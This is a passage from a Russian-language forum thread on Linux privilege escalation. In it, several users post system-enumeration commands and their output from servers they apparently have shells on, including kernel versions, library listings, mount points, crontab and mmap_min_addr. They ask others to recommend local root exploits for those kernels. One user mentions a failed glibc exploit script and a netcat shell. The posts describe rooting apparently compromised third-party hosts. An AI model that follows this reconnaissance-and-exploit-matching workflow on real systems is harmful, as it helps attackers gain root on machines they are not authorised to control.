Повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Expl0ited, 1 Oct 2011.

  1. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Глибц НЕ взял. Хотя странно. Новый вектор глибц тоже не взял.

    $ /lib/libc.so.6 | head -1
    энелайтмент
    cat /proc/sys/vm/mmap_min_addr= 4096

    Выручайте

    $ uname -a 2>&1
    $ ls -la /boot 2>&1
    $ ls -la --full-time /lib/lib* 2>&1
    $ mount 2>&1
    $ df -h 2>&1
    $ cat /etc/issue 2>&1
    $ cat /etc/crontab 2>&1
    $ cat /proc/version 2>&1
    $ cat /proc/sys/vm/mmap_min_addr 2>&1
    $ ls -la /usr/bin/staprun 2>&1
     
  2. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Evgeha514,
    $ /lib/libc.so.6 | head -1
    Вывод?
    Судя по дате - попробуй это
     
    #382 Pirotexnik, 29 Aug 2012
    Last edited: 29 Aug 2012
  3. fasty

    fasty Member

    Joined:
    9 May 2008
    Messages:
    0
    Likes Received:
    6
    Reputations:
    -10
    $ uname -a
    $ uname -r
    $ /lib/libc.so.6 | head -1
    $ uname -a 2>&1
    $ ls -la /boot 2>&1
    $ ls -la --full-time /lib/lib* 2>&1
    $ mount 2>&1
    $ df -h 2>&1
    $ cat /etc/issue 2>&1
    $ cat /etc/crontab 2>&1
    $ cat /proc/version 2>&1
    $ cat /proc/sys/vm/mmap_min_addr 2>&1
    $ ls -la /usr/bin/staprun 2>&1
    Нужно получить права на рут,что есть под это?
     
    #383 fasty, 29 Aug 2012
    Last edited: 29 Aug 2012
  4. rolexlease

    rolexlease New Member

    Joined:
    26 Jul 2012
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0

    kto po poemu mozhet chto skazat? ochen nuzhno
     
  5. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    покажи что там ls -la /var/spool
     
  6. fasty

    fasty Member

    Joined:
    9 May 2008
    Messages:
    0
    Likes Received:
    6
    Reputations:
    -10
    ls -la /var/spool
    PHP:
    drwxr-xr-x  4 root root 4096 Oct  5  2011 .
    drwxr-xr-x 14 root root 4096 Oct  4  2011 ..
    drwxr-xr-x  3 root root 4096 Oct  3  2011 cron
    lrwxrwxrwx  1 root root    7 Oct  3  2011 mail 
    -> ../mail
    drwxr
    -xr-x 17 root root 4096 Dec 19  2011 postfix
     
  7. Falknat

    Falknat New Member

    Joined:
    23 Jul 2011
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Linux dsde35.fornex.org 2.6.32-5-amd64 #1 SMP Mon Oct 3 03:59:20 UTC 2011 x86_64 GNU/Linux

    Кто поможет рутнуть или подскажет сплоит под это ядро?
     
  8. Hummer

    Hummer Member

    Joined:
    31 Jul 2012
    Messages:
    43
    Likes Received:
    23
    Reputations:
    5
    Подскажите , есть ли рабочие сплоиты под это ядро ?
    2.6.32-35-server #78-Ubuntu SMP Tue Oct 11 16:26:12 UTC 2011 x86_64
     
  9. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    $ uname -a
    Code:
    Linux 2.6.18-164.11.1.el5PAE #1 SMP Wed Jan 20 08:16:13 EST 2010 i686 i686 i386 GNU/Linux
    $ ls -la /boot 
    total 10992
    drwxr-xr-x  4 root root    1024 Sep 23 06:34 .
    drwxr-xr-x 24 root root    4096 Sep 23 06:49 ..
    -rw-r--r--  1 root root     166 Jan 20  2010 .vmlinuz-2.6.18-164.11.1.el5PAE.hmac
    -rw-r--r--  1 root root     161 Sep  3  2009 .vmlinuz-2.6.18-164.el5PAE.hmac
    -rw-r--r--  1 root root  953773 Jan 20  2010 System.map-2.6.18-164.11.1.el5PAE
    -rw-r--r--  1 root root  952431 Sep  3  2009 System.map-2.6.18-164.el5PAE
    -rw-r--r--  1 root root   68651 Jan 20  2010 config-2.6.18-164.11.1.el5PAE
    -rw-r--r--  1 root root   68616 Sep  3  2009 config-2.6.18-164.el5PAE
    drwxr-xr-x  2 root root    1024 Feb 13  2010 grub
    -rw-------  1 root root 2553029 Feb 13  2010 initrd-2.6.18-164.11.1.el5PAE.img
    -rw-------  1 root root 2552121 Feb 10  2010 initrd-2.6.18-164.el5PAE.img
    drwx------  2 root root   12288 Feb 10  2010 lost+found
    -rw-r--r--  1 root root   80032 Mar 12  2009 message
    -rw-r--r--  1 root root  107513 Jan 20  2010 symvers-2.6.18-164.11.1.el5PAE.gz
    -rw-r--r--  1 root root  107459 Sep  3  2009 symvers-2.6.18-164.el5PAE.gz
    -rw-r--r--  1 root root 1855924 Jan 20  2010 vmlinuz-2.6.18-164.11.1.el5PAE
    -rw-r--r--  1 root root 1852564 Sep  3  2009 vmlinuz-2.6.18-164.el5PAE
    $ ls -la --full-time /lib/lib*
    Code:
    -rwxr-xr-x 1 root root    7664 2010-10-25 16:16:56.000000000 -0700 /lib/libBrokenLocale-2.5.so
    lrwxrwxrwx 1 root root      22 2010-10-27 05:12:49.000000000 -0700 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
    -rwxr-xr-x 1 root root   16704 2010-10-25 16:16:56.000000000 -0700 /lib/libSegFault.so
    lrwxrwxrwx 1 root root      15 2010-02-10 10:47:57.000000000 -0800 /lib/libacl.so.1 -> libacl.so.1.1.0
    -rwxr-xr-x 1 root root   25940 2008-05-24 07:33:10.000000000 -0700 /lib/libacl.so.1.1.0
    -rwxr-xr-x 1 root root   14128 2010-10-25 16:16:56.000000000 -0700 /lib/libanl-2.5.so
    lrwxrwxrwx 1 root root      13 2010-10-27 05:12:49.000000000 -0700 /lib/libanl.so.1 -> libanl-2.5.so
    lrwxrwxrwx 1 root root      18 2010-02-10 10:48:52.000000000 -0800 /lib/libasound.so.2 -> libasound.so.2.0.0
    -rwxr-xr-x 1 root root  908940 2009-01-20 19:47:23.000000000 -0800 /lib/libasound.so.2.0.0
    lrwxrwxrwx 1 root root      16 2010-02-10 10:47:57.000000000 -0800 /lib/libattr.so.1 -> libattr.so.1.1.0
    -rwxr-xr-x 1 root root   15780 2007-01-05 21:12:05.000000000 -0800 /lib/libattr.so.1.1.0
    lrwxrwxrwx 1 root root      17 2010-02-10 10:47:50.000000000 -0800 /lib/libaudit.so.0 -> libaudit.so.0.0.0
    -rwxr-xr-x 1 root root  105412 2009-09-03 12:24:04.000000000 -0700 /lib/libaudit.so.0.0.0
    lrwxrwxrwx 1 root root      19 2010-02-10 10:47:50.000000000 -0800 /lib/libauparse.so.0 -> libauparse.so.0.0.0
    -rwxr-xr-x 1 root root   56344 2009-09-03 12:24:04.000000000 -0700 /lib/libauparse.so.0.0.0
    lrwxrwxrwx 1 root root      15 2010-02-10 10:48:35.000000000 -0800 /lib/libblkid.so.1 -> libblkid.so.1.0
    -rwxr-xr-x 1 root root   38620 2009-09-03 12:55:35.000000000 -0700 /lib/libblkid.so.1.0
    -rwxr-xr-x 1 root root 1689640 2010-10-25 16:16:56.000000000 -0700 /lib/libc-2.5.so
    lrwxrwxrwx 1 root root      11 2010-10-27 05:12:49.000000000 -0700 /lib/libc.so.6 -> libc-2.5.so
    lrwxrwxrwx 1 root root      14 2010-02-10 10:47:57.000000000 -0800 /lib/libcap.so.1 -> libcap.so.1.10
    -rwxr-xr-x 1 root root   11560 2007-03-14 11:15:10.000000000 -0700 /lib/libcap.so.1.10
    -rwxr-xr-x 1 root root  191708 2010-10-25 16:16:57.000000000 -0700 /lib/libcidn-2.5.so
    lrwxrwxrwx 1 root root      14 2010-10-27 05:12:49.000000000 -0700 /lib/libcidn.so.1 -> libcidn-2.5.so
    lrwxrwxrwx 1 root root      17 2010-02-10 10:48:35.000000000 -0800 /lib/libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x 1 root root    7748 2009-09-03 12:55:35.000000000 -0700 /lib/libcom_err.so.2.1
    -rwxr-xr-x 1 root root   45432 2010-10-25 16:16:57.000000000 -0700 /lib/libcrypt-2.5.so
    lrwxrwxrwx 1 root root      15 2010-10-27 05:12:49.000000000 -0700 /lib/libcrypt.so.1 -> libcrypt-2.5.so
    -rwxr-xr-x 1 root root 1296804 2010-01-20 10:02:05.000000000 -0800 /lib/libcrypto.so.0.9.8e
    lrwxrwxrwx 1 root root      24 2010-02-13 10:08:11.000000000 -0800 /lib/libcrypto.so.4 -> /lib/libcrypto.so.0.9.8e
    lrwxrwxrwx 1 root root      19 2010-02-13 02:25:28.000000000 -0800 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
    -rwxr-xr-x 1 root root 1011184 2009-09-19 19:06:41.000000000 -0700 /lib/libdb-4.3.so
    lrwxrwxrwx 1 root root      18 2010-02-13 02:25:57.000000000 -0800 /lib/libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x 1 root root  253392 2010-01-07 16:24:24.000000000 -0800 /lib/libdbus-1.so.3.4.0
    lrwxrwxrwx 1 root root      37 2010-02-13 02:25:31.000000000 -0800 /lib/libdevmapper-event-lvm2mirror.so -> libdevmapper-event-lvm2mirror.so.2.02
    -r-xr-xr-x 1 root root    7668 2009-11-02 02:29:02.000000000 -0800 /lib/libdevmapper-event-lvm2mirror.so.2.02
    lrwxrwxrwx 1 root root      39 2010-02-13 02:25:31.000000000 -0800 /lib/libdevmapper-event-lvm2snapshot.so -> libdevmapper-event-lvm2snapshot.so.2.02
    -r-xr-xr-x 1 root root    5808 2009-11-02 02:29:02.000000000 -0800 /lib/libdevmapper-event-lvm2snapshot.so.2.02
    lrwxrwxrwx 1 root root      25 2010-02-10 10:48:34.000000000 -0800 /lib/libdevmapper-event.a -> libdevmapper-event.a.1.02
    -r-xr-xr-x 1 root root   36024 2009-09-03 16:23:50.000000000 -0700 /lib/libdevmapper-event.a.1.02
    lrwxrwxrwx 1 root root      26 2010-02-10 10:48:34.000000000 -0800 /lib/libdevmapper-event.so -> libdevmapper-event.so.1.02
    -r-xr-xr-x 1 root root   15716 2009-09-03 16:23:51.000000000 -0700 /lib/libdevmapper-event.so.1.02
    lrwxrwxrwx 1 root root      19 2010-02-10 10:48:34.000000000 -0800 /lib/libdevmapper.a -> libdevmapper.a.1.02
    -r-xr-xr-x 1 root root  340178 2009-09-03 16:23:50.000000000 -0700 /lib/libdevmapper.a.1.02
    lrwxrwxrwx 1 root root      20 2010-02-10 10:48:35.000000000 -0800 /lib/libdevmapper.so -> libdevmapper.so.1.02
    -r-xr-xr-x 1 root root   98576 2009-09-03 16:23:51.000000000 -0700 /lib/libdevmapper.so.1.02
    -rwxr-xr-x 1 root root   20668 2010-10-25 16:16:57.000000000 -0700 /lib/libdl-2.5.so
    lrwxrwxrwx 1 root root      12 2010-10-27 05:12:49.000000000 -0700 /lib/libdl.so.2 -> libdl-2.5.so
    lrwxrwxrwx 1 root root      13 2010-02-10 10:48:35.000000000 -0800 /lib/libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x 1 root root   21608 2009-09-03 12:55:35.000000000 -0700 /lib/libe2p.so.2.3
    lrwxrwxrwx 1 root root      17 2010-02-13 02:25:28.000000000 -0800 /lib/libexpat.so.0 -> libexpat.so.0.5.0
    -rwxr-xr-x 1 root root  133120 2009-12-08 06:23:13.000000000 -0800 /lib/libexpat.so.0.5.0
    lrwxrwxrwx 1 root root      16 2010-02-10 10:48:35.000000000 -0800 /lib/libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x 1 root root  115216 2009-09-03 12:55:35.000000000 -0700 /lib/libext2fs.so.2.4
    -rwxr-xr-x 1 root root   46476 2010-01-13 20:16:25.000000000 -0800 /lib/libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx 1 root root      28 2010-02-13 02:25:22.000000000 -0800 /lib/libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx 1 root root      23 2010-02-10 10:47:49.000000000 -0800 /lib/libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root  644472 2009-03-24 18:52:17.000000000 -0700 /lib/libglib-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root      26 2010-02-10 10:47:49.000000000 -0800 /lib/libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root   11396 2009-03-24 18:52:17.000000000 -0700 /lib/libgmodule-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root      26 2010-02-10 10:47:49.000000000 -0800 /lib/libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root  259128 2009-03-24 18:52:17.000000000 -0700 /lib/libgobject-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root      26 2010-02-10 10:47:49.000000000 -0800 /lib/libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root   16212 2009-03-24 18:52:17.000000000 -0700 /lib/libgthread-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root   29440 2007-03-14 20:26:22.000000000 -0700 /lib/libiw.so.28
    -rwxr-xr-x 1 root root    7880 2007-01-05 23:57:38.000000000 -0800 /lib/libkeyutils-1.2.so
    lrwxrwxrwx 1 root root      18 2010-02-10 10:47:57.000000000 -0800 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so
    -rwxr-xr-x 1 root root  216544 2010-10-25 16:16:57.000000000 -0700 /lib/libm-2.5.so
    lrwxrwxrwx 1 root root      11 2010-10-27 05:12:49.000000000 -0700 /lib/libm.so.6 -> libm-2.5.so
    -rwxr-xr-x 1 root root  109740 2010-10-25 16:16:57.000000000 -0700 /lib/libnsl-2.5.so
    lrwxrwxrwx 1 root root      13 2010-10-27 05:12:49.000000000 -0700 /lib/libnsl.so.1 -> libnsl-2.5.so
    -rwxr-xr-x 1 root root   36416 2010-10-25 16:16:57.000000000 -0700 /lib/libnss_compat-2.5.so
    lrwxrwxrwx 1 root root      20 2010-10-27 05:12:49.000000000 -0700 /lib/libnss_compat.so.2 -> libnss_compat-2.5.so
    -rwxr-xr-x 1 root root  824548 2008-05-24 08:49:04.000000000 -0700 /lib/libnss_db-2.2.so
    lrwxrwxrwx 1 root root      16 2010-02-10 10:49:06.000000000 -0800 /lib/libnss_db.so.2 -> libnss_db-2.2.so
    -rwxr-xr-x 1 root root   21948 2010-10-25 16:16:57.000000000 -0700 /lib/libnss_dns-2.5.so
    lrwxrwxrwx 1 root root      17 2010-10-27 05:12:49.000000000 -0700 /lib/libnss_dns.so.2 -> libnss_dns-2.5.so
    -rwxr-xr-x 1 root root   50848 2010-10-25 16:16:57.000000000 -0700 /lib/libnss_files-2.5.so
    lrwxrwxrwx 1 root root      19 2010-10-27 05:12:49.000000000 -0700 /lib/libnss_files.so.2 -> libnss_files-2.5.so
    -rwxr-xr-x 1 root root   22764 2010-10-25 16:16:57.000000000 -0700 /lib/libnss_hesiod-2.5.so
    lrwxrwxrwx 1 root root      20 2010-10-27 05:12:49.000000000 -0700 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
    -rwxr-xr-x 1 root root 3200212 2009-10-27 07:01:00.000000000 -0700 /lib/libnss_ldap-2.5.so
    lrwxrwxrwx 1 root root      18 2010-02-13 02:25:30.000000000 -0800 /lib/libnss_ldap.so.2 -> libnss_ldap-2.5.so
    -rwxr-xr-x 1 root root   46536 2010-10-25 16:16:57.000000000 -0700 /lib/libnss_nis-2.5.so
    lrwxrwxrwx 1 root root      17 2010-10-27 05:12:49.000000000 -0700 /lib/libnss_nis.so.2 -> libnss_nis-2.5.so
    -rwxr-xr-x 1 root root   55804 2010-10-25 16:16:57.000000000 -0700 /lib/libnss_nisplus-2.5.so
    lrwxrwxrwx 1 root root      21 2010-10-27 05:12:49.000000000 -0700 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
    lrwxrwxrwx 1 root root      16 2010-03-16 12:31:24.000000000 -0700 /lib/libpam.so.0 -> libpam.so.0.81.5
    -rwxr-xr-x 1 root root   44532 2010-03-11 09:24:38.000000000 -0800 /lib/libpam.so.0.81.5
    lrwxrwxrwx 1 root root      21 2010-03-16 12:31:24.000000000 -0700 /lib/libpam_misc.so.0 -> libpam_misc.so.0.81.2
    -rwxr-xr-x 1 root root   10168 2010-03-11 09:24:38.000000000 -0800 /lib/libpam_misc.so.0.81.2
    lrwxrwxrwx 1 root root      17 2010-03-16 12:31:24.000000000 -0700 /lib/libpamc.so.0 -> libpamc.so.0.81.0
    -rwxr-xr-x 1 root root    9868 2010-03-11 09:24:38.000000000 -0800 /lib/libpamc.so.0.81.0
    lrwxrwxrwx 1 root root      16 2010-02-10 10:48:11.000000000 -0800 /lib/libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x 1 root root  118896 2007-11-29 21:10:26.000000000 -0800 /lib/libpcre.so.0.0.1
    -rwxr-xr-x 1 root root   54212 2009-01-21 00:39:50.000000000 -0800 /lib/libproc-3.2.7.so
    -rwxr-xr-x 1 root root  137908 2010-10-25 16:16:57.000000000 -0700 /lib/libpthread-2.5.so
    lrwxrwxrwx 1 root root      17 2010-10-27 05:12:49.000000000 -0700 /lib/libpthread.so.0 -> libpthread-2.5.so
    -rwxr-xr-x 1 root root   80636 2010-10-25 16:16:57.000000000 -0700 /lib/libresolv-2.5.so
    lrwxrwxrwx 1 root root      16 2010-10-27 05:12:49.000000000 -0700 /lib/libresolv.so.2 -> libresolv-2.5.so
    -rwxr-xr-x 1 root root   48156 2010-10-25 16:16:57.000000000 -0700 /lib/librt-2.5.so
    lrwxrwxrwx 1 root root      12 2010-10-27 05:12:49.000000000 -0700 /lib/librt.so.1 -> librt-2.5.so
    -rwxr-xr-x 1 root root   93508 2009-09-03 16:05:42.000000000 -0700 /lib/libselinux.so.1
    -rwxr-xr-x 1 root root  159412 2009-09-03 15:49:09.000000000 -0700 /lib/libsemanage.so.1
    -rwxr-xr-x 1 root root  245376 2009-09-03 13:40:26.000000000 -0700 /lib/libsepol.so.1
    lrwxrwxrwx 1 root root      12 2010-02-10 10:48:35.000000000 -0800 /lib/libss.so.2 -> libss.so.2.0
    -rwxr-xr-x 1 root root   20492 2009-09-03 12:55:35.000000000 -0700 /lib/libss.so.2.0
    -rwxr-xr-x 1 root root  286684 2010-01-20 10:02:05.000000000 -0800 /lib/libssl.so.0.9.8e
    lrwxrwxrwx 1 root root      21 2010-02-13 10:08:17.000000000 -0800 /lib/libssl.so.4 -> /lib/libssl.so.0.9.8e
    lrwxrwxrwx 1 root root      16 2010-02-13 02:25:28.000000000 -0800 /lib/libssl.so.6 -> libssl.so.0.9.8e
    -rwxr-xr-x 1 root root    6056 2007-03-14 10:17:47.000000000 -0700 /lib/libsysSp.so
    lrwxrwxrwx 1 root root      19 2010-02-10 10:47:51.000000000 -0800 /lib/libtermcap.so.2 -> libtermcap.so.2.0.8
    -rwxr-xr-x 1 root root   13084 2007-01-06 05:01:17.000000000 -0800 /lib/libtermcap.so.2.0.8
    -rwxr-xr-x 1 root root   35708 2010-10-25 16:16:57.000000000 -0700 /lib/libthread_db-1.0.so
    lrwxrwxrwx 1 root root      19 2010-10-27 05:12:49.000000000 -0700 /lib/libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x 1 root root   15308 2010-10-25 16:16:57.000000000 -0700 /lib/libutil-2.5.so
    lrwxrwxrwx 1 root root      14 2010-10-27 05:12:49.000000000 -0700 /lib/libutil.so.1 -> libutil-2.5.so
    lrwxrwxrwx 1 root root      14 2010-02-10 10:48:35.000000000 -0800 /lib/libuuid.so.1 -> libuuid.so.1.2
    -rwxr-xr-x 1 root root   15704 2009-09-03 12:55:35.000000000 -0700 /lib/libuuid.so.1.2
    lrwxrwxrwx 1 root root      22 2010-02-10 10:48:12.000000000 -0800 /lib/libvolume_id.so.0 -> libvolume_id.so.0.66.0
    -rwxr-xr-x 1 root root   32144 2009-09-03 15:25:42.000000000 -0700 /lib/libvolume_id.so.0.66.0
    lrwxrwxrwx 1 root root      16 2010-02-10 10:47:51.000000000 -0800 /lib/libwrap.so.0 -> libwrap.so.0.7.6
    -rwxr-xr-x 1 root root   32824 2009-09-21 15:37:30.000000000 -0700 /lib/libwrap.so.0.7.6
    $ mount
    Code:
    /dev/sda2 on / type ext3 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    /dev/sda8 on /home type ext3 (rw,usrquota)
    /dev/sda7 on /tmp type ext3 (rw)
    /dev/sda6 on /usr type ext3 (rw)
    /dev/sda5 on /var type ext3 (rw)
    /dev/sda1 on /boot type ext3 (rw)
    tmpfs on /dev/shm type tmpfs (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
    $ df -h
    Code:
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/sda2              16G   12G  2.8G  81% /
    /dev/sda8             761G  648G   75G  90% /home
    /dev/sda7             3.8G  332M  3.3G  10% /tmp
    /dev/sda6             7.6G  1.7G  5.6G  23% /usr
    /dev/sda5             7.6G  5.9G  1.4G  82% /var
    /dev/sda1             251M   21M  217M   9% /boot
    tmpfs                 4.0G     0  4.0G   0% /dev/shm
    $ cat /etc/issue
    Code:
    CentOS release 5.4 (Final)
    Kernel \r on an \m
    $ cat /etc/crontab
    Code:
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    
    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly
    $ cat /proc/version
    Code:
    Linux version 2.6.18-164.11.1.el5PAE ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Wed Jan 20 08:16:13 EST 2010
    $ cat /proc/sys/vm/mmap_min_addr
    Code:
    4096
    $ ls -la /usr/bin/staprun
    Code:
    ---s--x--- 1 root stapusr 62952 Nov 17  2010 /usr/bin/staprun
    Хэлп!
     
  10. P-29

    P-29 New Member

    Joined:
    4 Aug 2006
    Messages:
    47
    Likes Received:
    0
    Reputations:
    0
    Linux cust.******.net 2.6.9-89.0.19.ELsmp #1 SMP Fri Jan 8 06:30:48 EST
    2010 x86_64

    Помагите подобрать exploit пробывал glibc пишет sh: ./glibc_nondebian.sh: Permission denied
    Пользуюсь netcat sh-3.00$ выважу камандой sh -i это правильно или нет.

    sh-3.00$ ls -la /boot
    total 15401
    drwxr-xr-x 4 root root 1024 Jan 23 2010 .
    drwxr-xr-x 28 root root 4096 May 22 21:06 ..
    -rw-r--r-- 1 root root 924745 Jul 24 2008 System.map-2.6.9-78.EL
    -rw-r--r-- 1 root root 943487 Jul 25 2008 System.map-2.6.9-78.ELsmp
    -rw-r--r-- 1 root root 909272 Jan 8 2010 System.map-2.6.9-89.0.19.EL
    -rw-r--r-- 1 root root 928014 Jan 8 2010 System.map-2.6.9-89.0.19.ELsmp
    -rw-r--r-- 1 root root 45033 Jul 24 2008 config-2.6.9-78.EL
    -rw-r--r-- 1 root root 44659 Jul 25 2008 config-2.6.9-78.ELsmp
    -rw-r--r-- 1 root root 45150 Jan 8 2010 config-2.6.9-89.0.19.EL
    -rw-r--r-- 1 root root 44776 Jan 8 2010 config-2.6.9-89.0.19.ELsmp
    drwxr-xr-x 2 root root 1024 Jan 23 2010 grub
    -rw-r--r-- 1 root root 1098565 Jan 23 2010 initrd-2.6.9-78.EL.img
    -rw-r--r-- 1 root root 1078331 Jan 23 2010 initrd-2.6.9-78.ELsmp.img
    -rw-r--r-- 1 root root 1104619 Jan 23 2010 initrd-2.6.9-89.0.19.EL.img
    -rw-r--r-- 1 root root 1082497 Jan 23 2010 initrd-2.6.9-89.0.19.ELsmp.img
    drwx------ 2 root root 12288 Jan 23 2010 lost+found
    -rw-r--r-- 1 root root 9371 Aug 12 2006 message
    -rw-r--r-- 1 root root 9371 Aug 12 2006 message.ja
    -rw-r--r-- 1 root root 66175 Jul 24 2008 symvers-2.6.9-78.EL.gz
    -rw-r--r-- 1 root root 66959 Jul 25 2008 symvers-2.6.9-78.ELsmp.gz
    -rw-r--r-- 1 root root 67352 Jan 8 2010 symvers-2.6.9-89.0.19.EL.gz
    -rw-r--r-- 1 root root 68211 Jan 8 2010 symvers-2.6.9-89.0.19.ELsmp.gz
    -rw-r--r-- 1 root root 1846088 Jul 24 2008 vmlinuz-2.6.9-78.EL
    -rw-r--r-- 1 root root 1714106 Jul 25 2008 vmlinuz-2.6.9-78.ELsmp
    -rw-r--r-- 1 root root 1829633 Jan 8 2010 vmlinuz-2.6.9-89.0.19.EL
    -rw-r--r-- 1 root root 1700706 Jan 8 2010 vmlinuz-2.6.9-89.0.19.ELsmp

    sh-3.00$ ls -la --full-time /lib/lib*
    sh-3.00$ -rwxr-xr-x 1 root root 8320 2010-01-20 17:34:55.000000000 -0500 /lib/libBrokenLocale-2.3.4.s
    o
    lrwxrwxrwx 1 root root 24 2010-01-24 17:28:58.000000000 -0500 /lib/libBrokenLocale.so.1 -> libBroke
    nLocale-2.3.4.so
    -rwxr-xr-x 1 root root 8476 2010-01-20 17:34:55.000000000 -0500 /lib/libNoVersion-2.3.4.so
    lrwxrwxrwx 1 root root 21 2010-01-24 17:28:58.000000000 -0500 /lib/libNoVersion.so.1 -> libNoVersio
    n-2.3.4.so
    -rwxr-xr-x 1 root root 17400 2010-01-20 17:34:55.000000000 -0500 /lib/libSegFault.so
    -rwxr-xr-x 1 root root 14980 2010-01-20 17:34:55.000000000 -0500 /lib/libanl-2.3.4.so
    lrwxrwxrwx 1 root root 15 2010-01-24 17:28:58.000000000 -0500 /lib/libanl.so.1 -> libanl-2.3.4.so
    -rwxr-xr-x 1 root root 1530808 2010-01-20 17:34:56.000000000 -0500 /lib/libc-2.3.4.so
    lrwxrwxrwx 1 root root 13 2010-01-24 17:28:58.000000000 -0500 /lib/libc.so.6 -> libc-2.3.4.so
    -rwxr-xr-x 1 root root 192392 2010-01-20 17:34:56.000000000 -0500 /lib/libcidn-2.3.4.so
    lrwxrwxrwx 1 root root 16 2010-01-24 17:28:58.000000000 -0500 /lib/libcidn.so.1 -> libcidn-2.3.4.so

    -rwxr-xr-x 1 root root 40256 2010-01-20 17:34:56.000000000 -0500 /lib/libcrypt-2.3.4.so
    lrwxrwxrwx 1 root root 17 2010-01-24 17:28:58.000000000 -0500 /lib/libcrypt.so.1 -> libcrypt-2.3.4.
    so
    -rwxr-xr-x 1 root root 15048 2010-01-20 17:34:56.000000000 -0500 /lib/libdl-2.3.4.so
    lrwxrwxrwx 1 root root 14 2010-01-24 17:28:58.000000000 -0500 /lib/libdl.so.2 -> libdl-2.3.4.so
    -rwxr-xr-x 1 root root 212164 2010-01-20 17:34:56.000000000 -0500 /lib/libm-2.3.4.so
    lrwxrwxrwx 1 root root 13 2010-01-24 17:28:58.000000000 -0500 /lib/libm.so.6 -> libm-2.3.4.so
    -rwxr-xr-x 1 root root 100048 2010-01-20 17:34:56.000000000 -0500 /lib/libnsl-2.3.4.so
    lrwxrwxrwx 1 root root 15 2010-01-24 17:28:58.000000000 -0500 /lib/libnsl.so.1 -> libnsl-2.3.4.so
    -rwxr-xr-x 1 root root 35788 2010-01-20 17:34:56.000000000 -0500 /lib/libnss1_compat-2.3.4.so
    lrwxrwxrwx 1 root root 23 2010-01-24 17:28:58.000000000 -0500 /lib/libnss1_compat.so.1 -> libnss1_c
    ompat-2.3.4.so
    -rwxr-xr-x 1 root root 17960 2010-01-20 17:34:56.000000000 -0500 /lib/libnss1_dns-2.3.4.so
    lrwxrwxrwx 1 root root 20 2010-01-24 17:28:58.000000000 -0500 /lib/libnss1_dns.so.1 -> libnss1_dns-
    2.3.4.so
    -rwxr-xr-x 1 root root 42616 2010-01-20 17:34:56.000000000 -0500 /lib/libnss1_files-2.3.4.so
    lrwxrwxrwx 1 root root 22 2010-01-24 17:28:58.000000000 -0500 /lib/libnss1_files.so.1 -> libnss1_fi
    les-2.3.4.so
    -rwxr-xr-x 1 root root 39228 2010-01-20 17:34:56.000000000 -0500 /lib/libnss1_nis-2.3.4.so
    lrwxrwxrwx 1 root root 20 2010-01-24 17:28:58.000000000 -0500 /lib/libnss1_nis.so.1 -> libnss1_nis-
    2.3.4.so
    -rwxr-xr-x 1 root root 40812 2010-01-20 17:34:56.000000000 -0500 /lib/libnss_compat-2.3.4.so
    lrwxrwxrwx 1 root root 19 2010-01-24 17:28:58.000000000 -0500 /lib/libnss_compat.so.1 -> libnss1_co
    mpat.so.1
    lrwxrwxrwx 1 root root 22 2010-01-24 17:28:58.000000000 -0500 /lib/libnss_compat.so.2 -> libnss_com
    pat-2.3.4.so
    -rwxr-xr-x 1 root root 22524 2010-01-20 17:34:56.000000000 -0500 /lib/libnss_dns-2.3.4.so
    lrwxrwxrwx 1 root root 16 2010-01-24 17:28:58.000000000 -0500 /lib/libnss_dns.so.1 -> libnss1_dns.s
    o.1
    lrwxrwxrwx 1 root root 19 2010-01-24 17:28:58.000000000 -0500 /lib/libnss_dns.so.2 -> libnss_dns-2.
    3.4.so
    -rwxr-xr-x 1 root root 47420 2010-01-20 17:34:56.000000000 -0500 /lib/libnss_files-2.3.4.so
    lrwxrwxrwx 1 root root 18 2010-01-24 17:28:58.000000000 -0500 /lib/libnss_files.so.1 -> libnss1_fil
    es.so.1
